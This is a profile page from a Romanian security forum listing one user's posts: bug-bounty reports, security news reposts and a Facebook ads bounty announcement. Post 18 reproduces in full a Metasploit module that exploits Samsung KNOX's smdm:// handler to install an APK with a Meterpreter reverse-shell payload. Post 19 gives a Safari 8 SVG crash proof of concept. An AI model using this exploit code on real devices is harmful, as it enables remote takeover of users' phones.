Jump to content

akkiliON

Active Members
  • Content Count

    1086
  • Joined

  • Last visited

  • Days Won

    8

Everything posted by akkiliON

  1. Salutare tuturor, A trecut ceva timp de când n-am mai postat ce am găsit pe aici. Am găsit un XSS reflected în https://pay.google.com. Din păcate, merge doar pe Internet Explorer 11 din cauză că browser-ul nu suportă CSP-ul. Partea bună, este că vulnerabilitatea pe care am găsit-o a fost validată. Cam atât pot spune în momentul de față. Numai bine.
  2. English | ISBN-13: 978-1466592612 | 532 pages | PDF | 23 MB In this book, web security expert Wu Hanqing reveals how hackers work and explains why companies of different scale require different security methodologies. With in-depth analysis of the reasons behind the choices, the book covers client script security, server applications security, and Internet company security operations. It also includes coverage of browser security, cross sites script attacks, click jacking, HTML5/PHP security, injection attacks, authentication, session management, access control, web frame security, DDOS, leaks, Internet transactions security, and the security development lifecycle. Link : Dropbox - Web Security: A WhiteHat Perspective
  3. Happy birthday @M2G !
  4. Un prieten de-al meu a gasit un SQL Injection si a primit duplicate. Am raportat si eu un XSS (Flash), dar degeaba. Am primit duplicate.
  5. Felicit?ri, ?i-au validat problema ?
  6. Even as Bitcoin is starting to shake things up in the US, all is not well in the cryptocurrency world. China-based Bitcoin exchange Bter was hacked on Valentine’s Day and $1.75 million worth of Bitcoin was stolen. The company hasn’t revealed much about the breach, except that 7,170 BTC was taken from its cold (offline) wallet on February 14 via a single transaction (link) and that the platform is suspending operations until further notice. The company has offered a bounty of 720 BTC – about $170,000 – for the retrieval of the stolen currency. It says it will arrange withdrawals of unaffected funds at a later date. This is the second major Bitcoin hack in the past two months. Slovenian exchange Bitstamp lost about $5 million worth of currency in January but has since resumed service. More positively, Coinbase launched the first US Bitcoin exchange last month, ahead of the launch of Lunar, a competitor backed by the Winklevoss twins. It’s likely that this year’s debate around Bitcoin will center more on security than whether businesses or individuals choose to adopt the currency. Bter blockchain.info Source: $1.75 Million in Bitcoin Stolen from Chinese Exchange Bter
  7. akkiliON

    Yahoo XSS

    Request-ul se f?cea prin POST Method.
  8. akkiliON

    Yahoo XSS

    Am zis c? n-are rost s? mai creez un alt topic. Vreau doar s? spun c? am g?sit un XSS Stored în portal.office.com (Microsoft), care se putea exploata. Am fost recompensat cu 1500$ + un loc in Hall of Fame. Vulnerabilitatea a fost fixat?.
  9. Microsoft has heavily criticized Google and its 90-days security disclosure policy after the firm publicly revealed two zero-day vulnerabilities in Microsoft’s Windows 8.1 operating system one after one just days before Microsoft planned to issue a patch to kill the bugs. But, seemingly Google don't give a damn thought. Once again, Google has publicly disclosed a new serious vulnerability in Windows 7 and Windows 8.1 before Microsoft has been able to produce a patch, leaving users of both the operating systems exposed to hackers until next month, when the company plans to deliver a fix. DISCLOSURE OF UNPATCHED BUGS, GOOD OR BAD? Google’s tight 90-days disclosure policy seems to be a good move for all software vendors to patch their products before they get exploited by the hackers and cybercriminals. But at the same time, disclosing all critical bugs along with its technical details in the widely used operating system like Windows 7 and 8 doesn’t appears to be a right decision either. In both cases, the only one to suffer is the innocent users. The revelation of the security flaw was also a part Google's Project Zero, an initiative that identifies security holes in different software and calls on companies to publicly disclose and patch bugs within 90 days of discovering them. This time the search engine giant has discovered a flaw in the CryptProtectMemory memory-encrypting function found within Windows 7 and 8.1 and presents in both 32- and 64-bit architectures, which can accidentally disclose sensitive information or allow a miscreant to bypass security checks, apparently. MICROSOFT WILL DELIVER PATCH IN FEB, 2015 Google first notified Microsoft of the vulnerability in Windows 7 and 8.1 on October 17, 2014. Microsoft then confirmed the security issues on October 29 and said that its developers managed to reproduce the security hole. The patch for the vulnerability is scheduled for Feb. 10, next Patch Tuesday. The vulnerability was found by James Forshaw, who also discovered a "privilege elevation flaw" in Windows 8.1, which was disclosed earlier this week and drew strong criticism from Microsoft. The newly discovered bug actually resides in the CNG.sys implementation, which failed to run proper token checks. This is third time in less than a month when the Google’s Project Zero released details of the vulnerability in Microsoft’s operating system, following its 90-day public disclosure deadline policy. Few days ago, Google released details of a new privilege escalation bug in Microsoft's Windows 8.1 operating system just two days before Microsoft planned to patch the bug. Google vs. Microsoft — Google reveals Third unpatched Zero-Day Vulnerability in Windows - Hacker News
  10. akkiliON

    Yahoo XSS

    Nu, înc? nici nu e fixat? problema.
  11. akkiliON

    Yahoo XSS

    Vulnerabilitate: Cross-site-scripting stored Autor: akkiliON Raportat? si validat?. Se poate exploata, nu e self. Dovad?:
  12. Download: 92.58 MB/s Upload: 92.66 MB/s ISP: RDS & RCS
  13. Shit happens. Take a look: https://hackerone.com/reports/12685
  14. Starting today and extending through the end of 2014, all Whitehat bugs in our ads code will receive double bounties. We recently completed a comprehensive security audit of this area ourselves. We found and fixed a number of security bugs but would like to encourage additional scrutiny from Whitehats to see what we might have missed. Also, since the vast majority of bug reports we work on with the Whitehat community are focused on the more common parts of Facebook code, we hope to encourage researchers to become more familiar with the surface area of ads to better protect the businesses that use them. Below are some tips for successfully finding bugs in ads code. Here is a sampling of past Whitehat bugs in ads that we've fixed: Redeeming the same ads coupon multiple times without expiry. Retrieving the name of an unpublished Page via the Ads Create Tool by guessing its Page ID. Arbitrary local file read via a .zip symlink (more details in this post) Injecting JavaScript into an ads report email and then leveraging a CSRF bug to make a victim send a malicious email to a target on your behalf. Ads can be organized into a few sections: UI - The UI is made up of our old and new Ads Manager tools (at /ads/manage/), as well as the JavaScript-based Power Editor tool that supports bulk ad edits and uploads. Most of the serious Whitehat bugs in this area have surfaced around permissions, viewing ads, or parts of an ad that is not yours. Ads API (https://developers.facebook.com/docs/ads-api) - The documentation for this frequently used API is a good introduction to the describe components of ads: a user ID, a campaign, an account, creative and so on. While not present in the ads API itself, the following writeup describes an excellent bug of the type that might be found in there: Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User. Analytics, also called insights - Analytics is what measures the performance of an ad, how well the ads are performing, and so on. Like with UI, the bugs we've seen in this area that had the largest impact have been missing or incorrect permissions checks. For example, we had an issue where someone could access insights for any application via a Graph API token with the read_insights permission. Everything else - There is a lot of backend code to correctly target, deliver, bill and measure ads. This code isn't directly reachable via the website, but of the small number of issues that have been found in these areas, they are relatively high impact. At this stage of our bug bounty program, it's uncommon for us to see many of the common web security bugs like XSS. What we see more often are things like missing or incorrect permissions checks, insufficient rate-limiting that can lead to scraping, edge-case CSRF issues, and problems with SWFs. Ads-related code is the main part of Facebook that has and enforces roles, so it's also worthwhile to understand them: https://www.facebook.com/help/289207354498410. Among these roles, the permissions for reading or writing billing information are the most relevant. The best way to report an issue is to use your Whitehat test account: https://www.facebook.com/whitehat/accounts/. Good luck, and keep the submissions coming! Surs?: https://www.facebook.com/notes/protect-the-graph/doubling-up-on-ads-code-bounties/1519314984975314
  15. A fost frumos challenge-ul. A?tept ?i urm?torul.
  16. A fost postat. https://rstforums.com/forum/92177-samsung-galaxy-knox-android-browser-remote-code-execution.rst
  17. Doar câteva minute au trecut de când am v?zut la TV. L.E: http://www.fbi.gov/wanted/cyber
  18. This Metasploit module exploits a vulnerability that exists in the KNOX security component of the Samsung Galaxy firmware that allows a remote webpage to install an APK with arbitrary permissions by abusing the 'smdm://' protocol handler registered by the KNOX component. The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3, and Ace 4. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'digest/md5' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserExploitServer # Hash that maps payload ID -> (0|1) if an HTTP request has # been made to download a payload of that ID attr_reader :served_payloads def initialize(info = {}) super(update_info(info, 'Name' => 'Samsung Galaxy KNOX Android Browser RCE', 'Description' => %q{ A vulnerability exists in the KNOX security component of the Samsung Galaxy firmware that allows a remote webpage to install an APK with arbitrary permissions by abusing the 'smdm://' protocol handler registered by the KNOX component. The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3, and Ace 4. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andre Moulu', # discovery and advisory 'joev' # msf module ], 'References' => [ ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'], ['OSVDB', '114590'] ], 'Platform' => 'android', 'Arch' => ARCH_DALVIK, 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Nov 12 2014', 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :os_name => OperatingSystems::Match::ANDROID } )) register_options([ OptString.new('APK_VERSION', [ false, "The update version to advertise to the client", "1337" ]) ], self.class) deregister_options('JsObfuscate') end def exploit @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain') elsif req.uri =~ /launch$/ send_response_html(cli, launch_html) else super end end # The browser appears to be vulnerable, serve the exploit def on_request_exploit(cli, req, browser) print_status "Serving exploit..." send_response_html(cli, generate_html) end def magic_headers { 'Content-Length' => apk_bytes.length, 'ETag' => Digest::MD5.hexdigest(apk_bytes), 'x-amz-meta-apk-version' => datastore['APK_VERSION'] } end def generate_html %Q| <!doctype html> <html><body> <script> #{exploit_js} </script></body></html> | end def exploit_js payload_id = rand_word js_obfuscate %Q| function poll() { var xhr = new XMLHttpRequest(); xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999); xhr.onreadystatechange = function(){ if (xhr.readyState == 4) { if (xhr.responseText == '1') { setTimeout(killEnrollment, 100); } else { setTimeout(poll, 1000); setTimeout(enroll, 0); setTimeout(enroll, 500); } } }; xhr.onerror = function(){ setTimeout(poll, 1000); setTimeout(enroll, 0); }; xhr.send(); } function enroll() { var loc = window.location.href.replace(/[/.]$/g, ''); top.location = 'smdm://#{rand_word}?update_url='+ encodeURIComponent(loc)+'/#{payload_id}.apk'; } function killEnrollment() { top.location = "intent://#{rand_word}?program="+ "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end"; setTimeout(launchApp, 300); } function launchApp() { top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end'; } enroll(); setTimeout(poll,600); | end def rand_word Rex::Text.rand_text_alphanumeric(3+rand(12)) end end Source: Samsung Galaxy KNOX Android Browser Remote Code Execution ? Packet Storm
  19. @w3bd3vil <!DOCTYPE html> <head> <style> svg { padding-top: 1337%; box-sizing: border-box; } </style> </head> <body> <svg viewBox="0 0 500 500" width="500" height="500"> <polyline points="1 1,2 2"></polyline> </svg> </body> </html> <!-- Safari 8.0 / OSX 10.10 * thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10 libsystem_kernel.dylib`__pthread_kill + 10: -> 0x7fff8ab10282: jae 0x7fff8ab1028c ; __pthread_kill + 20 0x7fff8ab10284: movq %rax, %rdi 0x7fff8ab10287: jmp 0x7fff8ab0bca3 ; cerror_nocancel 0x7fff8ab1028c: retq (lldb) register read General Purpose Registers: rax = 0x0000000000000000 rbx = 0x0000000000000006 rcx = 0x00007fff5b761d98 rdx = 0x0000000000000000 rdi = 0x000000000000140f rsi = 0x0000000000000006 rbp = 0x00007fff5b761dc0 rsp = 0x00007fff5b761d98 r8 = 0x0000000000000000 r9 = 0x00000000000000a8 r10 = 0x0000000008000000 r11 = 0x0000000000000206 r12 = 0x00007fff84b36487 "transform_is_valid(m)" r13 = 0x0000000108c2c000 r14 = 0x00007fff747ae300 libsystem_pthread.dylib`_thread r15 = 0x00007fff84b36477 "Paths/CGPath.cc" rip = 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10 rflags = 0x0000000000000206 cs = 0x0000000000000007 fs = 0x0000000000000000 gs = 0x0000000000000000 (lldb) bt * thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT * frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10 frame #1: 0x00007fff904df4c3 libsystem_pthread.dylib`pthread_kill + 90 frame #2: 0x00007fff88d36b73 libsystem_c.dylib`abort + 129 frame #3: 0x00007fff88cfec59 libsystem_c.dylib`__assert_rtn + 321 frame #4: 0x00007fff84643cb6 CoreGraphics`CGPathCreateMutableCopyByTransformingPath + 242 frame #5: 0x00007fff84692a2f CoreGraphics`CGContextAddPath + 93 frame #6: 0x00007fff8e9b5f04 WebCore`WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148 frame #7: 0x00007fff8f479ad1 WebCore`WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65 frame #8: 0x00007fff8f47a2fa WebCore`WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122 frame #9: 0x00007fff8f47a633 WebCore`WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131 frame #10: 0x00007fff8eab4aeb WebCore`WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379 frame #11: 0x00007fff8eab477d WebCore`WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1325 frame #12: 0x00007fff8ea2c3f2 WebCore`WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722 frame #13: 0x00007fff8ef300a8 WebCore`WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312 frame #14: 0x00007fff8e9b1e83 WebCore`WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251 frame #15: 0x00007fff8e9b1929 WebCore`WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89 frame #16: 0x00007fff8e9613c6 WebCore`WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694 frame #17: 0x00007fff8e95e9a3 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67 frame #18: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420 frame #19: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287 frame #20: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393 frame #21: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72 frame #22: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240 frame #23: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420 frame #24: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287 frame #25: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393 frame #26: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72 frame #27: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240 frame #28: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420 frame #29: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287 frame #30: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393 frame #31: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72 frame #32: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240 frame #33: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420 frame #34: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287 frame #35: 0x00007fff8e95e8e2 WebCore`WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370 frame #36: 0x00007fff8e95e5b7 WebCore`WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423 frame #37: 0x00007fff8e95d252 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2386 frame #38: 0x00007fff8e95c6e2 WebCore`WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010 frame #39: 0x00007fff8e95d392 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2706 frame #40: 0x00007fff8e988376 WebCore`WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358 frame #41: 0x00007fff8f432baf WebCore`WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799 frame #42: 0x00007fff8ee86924 WebCore`WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132 frame #43: 0x00007fff8f3b2f59 WebCore`WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361 frame #44: 0x00007fff8f60f367 WebCore`WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167 frame #45: 0x00007fff8f6983fc WebCore`-[WebSimpleLayer drawInContext:] + 172 frame #46: 0x00007fff85249355 QuartzCore`CABackingStoreUpdate_ + 3820 frame #47: 0x00007fff85248463 QuartzCore`___ZN2CA5Layer8display_Ev_block_invoke + 59 frame #48: 0x00007fff8524841f QuartzCore`x_blame_allocations + 81 frame #49: 0x00007fff85247f1c QuartzCore`CA::Layer::display_() + 1546 frame #50: 0x00007fff8f69831b WebCore`-[WebSimpleLayer display] + 43 frame #51: 0x00007fff85247641 QuartzCore`CA::Layer::display_if_needed(CA::Transaction*) + 603 frame #52: 0x00007fff85246d7d QuartzCore`CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35 frame #53: 0x00007fff8524650e QuartzCore`CA::Context::commit_transaction(CA::Transaction*) + 242 frame #54: 0x00007fff85246164 QuartzCore`CA::Transaction::commit() + 390 frame #55: 0x00007fff85256f55 QuartzCore`CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71 frame #56: 0x00007fff867e5d87 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23 frame #57: 0x00007fff867e5ce0 CoreFoundation`__CFRunLoopDoObservers + 368 frame #58: 0x00007fff867d7858 CoreFoundation`CFRunLoopRunSpecific + 328 frame #59: 0x00007fff8434943f HIToolbox`RunCurrentEventLoopInMode + 235 frame #60: 0x00007fff843491ba HIToolbox`ReceiveNextEventCommon + 431 frame #61: 0x00007fff84348ffb HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71 frame #62: 0x00007fff90583821 AppKit`_DPSNextEvent + 964 frame #63: 0x00007fff90582fd0 AppKit`-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 194 frame #64: 0x00007fff90576f73 AppKit`-[NSApplication run] + 594 frame #65: 0x00007fff90562424 AppKit`NSApplicationMain + 1832 frame #66: 0x00007fff8d881ef2 libxpc.dylib`_xpc_objc_main + 793 frame #67: 0x00007fff8d883a9d libxpc.dylib`xpc_main + 490 frame #68: 0x000000010449ab40 com.apple.WebKit.WebContent`___lldb_unnamed_function1$$com.apple.WebKit.WebContent + 16 frame #69: 0x00007fff850755c9 libdyld.dylib`start + 1 frame #70: 0x00007fff850755c9 libdyld.dylib`start + 1 (lldb) --> Source: Safari 8.0 / OS X 10.10 - Crash PoC
  20. It’s been almost two weeks since the WireLurker malware existence was revealed for the first time, and Chinese authorities have arrested three suspects who are allegedly the authors of the Mac- and iOS-based malware that may have infected as many as hundreds of thousands of Apple users. The Beijing Bureau of Public security has announced the arrest of three suspects charged with distributing the WireLurker malware through a popular Chinese third-party online app store. The authorities also say the website that was responsible for spreading the malware has also been shut down. "WireLurker" malware was originally discovered earlier this month by security firm Palo Alto Networks targeting Apple users in China. The malware appeared as the first malicious software program that has ability to penetrate the iPhone's strict software controls. The main concern to worry about this threat was its ability to attack non-jailbroken iOS devices. Once a device infected with the malware, the virus could download the malicious and unapproved apps, which are designed to steal information, from the third-party app stores and, if it detects an iOS device connected through the USB slot, it would install the malicious apps on the device as well. Unlike most iPhone bug, WireLurker malware has ability to install even on non-jailbroken iOS devices because the malware authors have used enterprise certificates to sign the apps. Apple has since revoked these cryptographic certificates used to sign WireLurker, and blocked all the apps signed with it. Palo Alto estimated that hundreds of thousands of users installed the malicious apps. China appears to have taken the threat very seriously and within two weeks arrested three individuals who are believed to be the creators of the malicious software. Although, there is not much details available about the arrest as the Bureau has simply posted a short notification on its Sina Weibo, a Chinese micro blogging service. But according to the Chinese authorities, the three suspects are identified as "Chen," "Lee" and "Wang," who are suspected of manufacturing and distributing the malicious program "for illegal profit," and that the Chinese authorities have been helped in the investigation by researchers from Chinese AV company Qihoo 360. Surs?: http://thehackernews.com/2014/11/suspected-wirelurker-ios-malware.html
×
×
  • Create New...